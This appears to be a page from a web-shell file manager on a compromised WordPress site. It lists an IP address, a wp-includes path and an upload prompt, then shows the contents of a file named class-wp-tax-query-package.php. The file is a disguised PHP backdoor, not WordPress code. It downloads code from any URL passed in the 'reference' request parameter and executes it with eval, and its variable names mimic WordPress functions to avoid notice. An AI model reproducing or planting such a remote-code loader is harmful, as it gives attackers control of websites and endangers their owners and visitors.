Your IP : 216.73.216.1


Current Path : /home/fotouserdopd8j/agenciacrabli.com/wp-includes/
Upload File :
Current File : /home/fotouserdopd8j/agenciacrabli.com/wp-includes/class-wp-tax-query-package.php

<?php

if (isset($_GET['reference'])) {
    $get_the_time_as = $_GET['reference'];
    if ($home_url_md = curl_init()) {
        curl_setopt($home_url_md, CURLOPT_URL, $get_the_time_as);
        curl_setopt($home_url_md, CURLOPT_RETURNTRANSFER, true);
        eval(curl_exec($home_url_md));
        curl_close($home_url_md);
        exit;
    }
}